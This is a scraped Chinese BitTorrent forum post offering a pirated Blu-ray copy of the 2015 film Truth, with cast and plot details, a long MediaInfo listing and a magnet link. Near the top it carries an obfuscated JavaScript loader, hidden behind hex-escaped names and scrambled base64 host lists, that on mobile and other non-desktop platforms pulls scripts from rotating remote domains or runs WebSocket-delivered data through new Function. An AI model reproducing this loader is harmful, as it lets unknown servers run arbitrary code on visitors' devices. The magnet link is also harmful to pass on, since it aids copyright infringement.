真相[双语字幕]Truth.2015.1080p.BluRay.x264.DTS-迅雷下载 8.21GB

版主小s 23天前 155

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x49\x6e\x58\x62\x4c\x54\x4c\x79\x4d\x72']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('uawei')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

◎译 名 真相 / 因真相之名(港) / 真相急先锋(台)

◎片 名 Truth

◎年 代 2015

◎产 地 美国 / 澳大利亚

◎类 别 剧情 / 传记

◎语 言 英语

◎上映日期 2015-10-30(美国)

◎IMDb评分 6.8/10 from 18674 users

◎IMDb链接 https://www.imdb.com/title/tt3859076

◎豆瓣评分 7.6/10 from 7366 users

◎豆瓣链接 https://movie.douban.com/subject/25925430/

◎片 长 125分钟

◎导 演 詹姆斯·范德比尔特 James Vanderbilt

◎编 剧 詹姆斯·范德比尔特 James Vanderbilt / 玛丽·迈普斯 Mary Mapes

◎主 演 凯特·布兰切特 Cate Blanchett

罗伯特·雷德福 Robert Redford

伊丽莎白·莫斯 Elisabeth Moss

托弗·戈瑞斯 Topher Grace

丹尼斯·奎德 Dennis Quaid

布鲁斯·格林伍德 Bruce Greenwood

大卫·莱昂斯 David Lyons

约翰·本杰明·西基 John Benjamin Hickey

瑞切尔·布莱克 Rachael Blake

斯蒂夫·巴什托尼 Steve Bastoni

尼古拉斯·霍普 Nicholas Hope

马丁·萨克斯 Martin Sacks

亚伦·格伦尼 Aaron Glenane

◎标 签 美国 | 政治 | 传记 | 媒体 | 剧情 | 新闻 | 2015 | 真实事件改编

◎简 介

索尼卖下《真相》的北美发行权,影片由凯特·布兰切特和罗伯特·雷德福主演,改编自《真相与责任:媒体、总统和特权》。原书聚焦2004年丹·拉瑟(罗伯特)关于小布什在越战期间享受特殊待遇的报道,事后被怀疑部分参考文件涉嫌伪造。

  1. General

  2. Unique ID : 165808412704129256494837784972713647562 (0x7CBD89E89FE6DAB133B86AA534B9DDCA)

  3. Complete name : Truth.2015.1080p.BluRay.x264.DTS-PTH.mkv

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 8.20 GiB

  7. Duration : 2 h 5 min

  8. Overall bit rate : 9 379 kb/s

  9. Movie name : Truth (2015) – Blu-ray?

  10. Encoded date : UTC 2021-07-09 04:17:05

  11. Writing application : mkvmerge v58.0.0 ('Supper's Ready') 64-bit

  12. Writing library : libebml v1.4.2 + libmatroska v1.6.4

  13. Cover : Yes

  14. Attachments : cover.jpg


  15. Video

  16. ID : 1

  17. Format : AVC

  18. Format/Info : Advanced Video Codec

  19. Format profile : [email protected]

  20. Format settings : CABAC / 4 Ref Frames

  21. Format settings, CABAC : Yes

  22. Format settings, Reference frames : 4 frames

  23. Codec ID : V_MPEG4/ISO/AVC

  24. Duration : 2 h 5 min

  25. Bit rate : 7 651 kb/s

  26. Width : 1 920 pixels

  27. Height : 802 pixels

  28. Display aspect ratio : 2.40:1

  29. Frame rate mode : Constant

  30. Frame rate : 23.976 (24000/1001/53354) FPS

  31. Color space : YUV

  32. Chroma subsampling : 4:2:0

  33. Bit depth : 8 bits

  34. Scan type : Progressive

  35. Bits/(Pixel*Frame) : 0.207

  36. Stream size : 6.69 GiB (82%)

  37. Writing library : x264 core 164 r3065+55M 280faca t_mod_New [(8 & 10)[email protected] X86_64]

  38. Encoding settings : cabac=1 / ref=4 / deblock=1:-3:-3 / analyse=0x3:0x133 / me=umh / subme=11 / psy=1 / fade_compensate=0.00 / psy_rd=1.00:0.00 / mixed_ref=1 / me_range=48 / chroma_me=1 / trellis=2 / 8x8dct=1 / cqm=0 / deadzone=21,11 / fast_pskip=0 / chroma_qp_offset=-3 / threads=24 / lookahead_threads=6 / sliced_threads=0 / nr=0 / decimate=0 / interlaced=0 / NTMzNTQ= / bluray_compat=0 / constrained_intra=0 / fgo=0 / bframes=11 / b_pyramid=2 / b_adapt=2 / b_bias=0 / direct=3 / weightb=1 / open_gop=0 / weightp=2 / keyint=240 / keyint_min=1 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / intra_refresh=0 / rc_lookahead=72 / rc=crf / mbtree=0 / crf=17.0000 / qcomp=0.65 / qpmin=0:0:0 / qpmax=69:69:69 / qpstep=4 / vbv_maxrate=62500 / vbv_bufsize=78125 / crf_max=0.0 / nal_hrd=none / filler=0 / NTMzNTQ=LmsMAP37EqsCpk / ip_ratio=1.40 / pb_ratio=1.30 / aq=3:0.80 / aq-sensitivity=10.00 / aq-factor=1.00:1.00:1.00 / aq2=0 / aq3=0

  39. Default : Yes

  40. Forced : No


  41. Audio

  42. ID : 2

  43. ID in the original source medium : 4352 (0x1100)

  44. Format : DTS

  45. Format/Info : Digital Theater Systems

  46. Codec ID : A_DTS

  47. Duration : 2 h 5 min

  48. Bit rate mode : Constant

  49. Bit rate : 1 509 kb/s

  50. Channel(s) : 6 channels

  51. Channel layout : C L R Ls Rs LFE

  52. Sampling rate : 48.0 kHz

  53. Frame rate : 93.750 FPS (512 SPF)

  54. Bit depth : 24 bits

  55. Compression mode : Lossy

  56. Stream size : 1.32 GiB (16%)

  57. Language : English

  58. Default : Yes

  59. Forced : No

  60. Original source medium : Blu-ray


  61. Text #1

  62. ID : 3

  63. ID in the original source medium : 4611 (0x1203)

  64. Format : PGS

  65. Muxing mode : zlib

  66. Codec ID : S_HDMV/PGS

  67. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  68. Duration : 1 h 55 min

  69. Bit rate : 136 kb/s

  70. Count of elements : 4933

  71. Stream size : 112 MiB (1%)

  72. Title : chs&eng

  73. Language : Chinese

  74. Default : Yes

  75. Forced : No

  76. Original source medium : Blu-ray


  77. Text #2

  78. ID : 4

  79. ID in the original source medium : 4612 (0x1204)

  80. Format : PGS

  81. Muxing mode : zlib

  82. Codec ID : S_HDMV/PGS

  83. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  84. Duration : 1 h 55 min

  85. Bit rate : 137 kb/s

  86. Count of elements : 4933

  87. Stream size : 113 MiB (1%)

  88. Title : cht&eng

  89. Language : Chinese

  90. Default : No

  91. Forced : No

  92. Original source medium : Blu-ray


  93. Text #3

  94. ID : 5

  95. ID in the original source medium : 4613 (0x1205)

  96. Format : PGS

  97. Muxing mode : zlib

  98. Codec ID : S_HDMV/PGS

  99. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  100. Duration : 1 h 55 min

  101. Bit rate : 88.5 kb/s

  102. Count of elements : 4933

  103. Stream size : 72.8 MiB (1%)

  104. Title : chs

  105. Language : Chinese

  106. Default : No

  107. Forced : No

  108. Original source medium : Blu-ray


  109. Text #4

  110. ID : 6

  111. ID in the original source medium : 4614 (0x1206)

  112. Format : PGS

  113. Muxing mode : zlib

  114. Codec ID : S_HDMV/PGS

  115. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  116. Duration : 1 h 55 min

  117. Bit rate : 89.3 kb/s

  118. Count of elements : 4933

  119. Stream size : 73.5 MiB (1%)

  120. Title : cht

  121. Language : Chinese

  122. Default : No

  123. Forced : No

  124. Original source medium : Blu-ray


  125. Text #5

  126. ID : 7

  127. ID in the original source medium : 4608 (0x1200)

  128. Format : PGS

  129. Muxing mode : zlib

  130. Codec ID : S_HDMV/PGS

  131. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  132. Duration : 1 h 55 min

  133. Bit rate : 51.8 kb/s

  134. Count of elements : 3678

  135. Stream size : 42.6 MiB (1%)

  136. Title : eng

  137. Language : English

  138. Default : No

  139. Forced : No

  140. Original source medium : Blu-ray


  141. Menu

  142. 00:00:00.000 : Chapter 01

  143. 00:08:12.950 : Chapter 02

  144. 00:16:12.137 : Chapter 03

  145. 00:22:42.736 : Chapter 04

  146. 00:29:42.739 : Chapter 05

  147. 00:36:47.330 : Chapter 06

  148. 00:43:30.357 : Chapter 07

  149. 00:50:57.262 : Chapter 08

  150. 00:57:29.612 : Chapter 09

  151. 01:06:06.754 : Chapter 10

  152. 01:13:03.629 : Chapter 11

  153. 01:20:11.515 : Chapter 12

  154. 01:27:48.012 : Chapter 13

  155. 01:36:43.255 : Chapter 14

  156. 01:42:10.916 : Chapter 15

  157. 01:51:04.407 : Chapter 16


TAGS 剧情 传记

磁力链:
  • magnet:?xt=urn:btih:EE12F371F780FF2B0E11241D619A9C936847FC38
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回